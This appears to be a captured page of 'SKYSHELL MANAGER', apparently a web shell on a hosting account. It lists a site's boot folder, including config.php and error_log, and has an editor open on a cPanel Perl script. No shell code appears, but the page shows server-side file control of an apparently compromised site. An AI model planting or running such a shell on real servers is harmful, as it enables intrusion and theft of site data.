📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuries.com
/
boot
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📁
css
-
0755
🗑️
🔒
📁
js
-
0755
🗑️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
1444.66 KB
0644
🗑️
⬇️
✏️
🔒
Editing: listcheck
#!/usr/local/cpanel/3rdparty/bin/perl # cpanel - scripts/listcheck Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited if ( !-e '/var/cpanel/cp76maillists' ) { system '/usr/local/cpanel/scripts/resetmailmanurls'; open( my $m_fh, '>>', '/var/cpanel/cp76maillists' ); close $m_fh; }
💾 Save Changes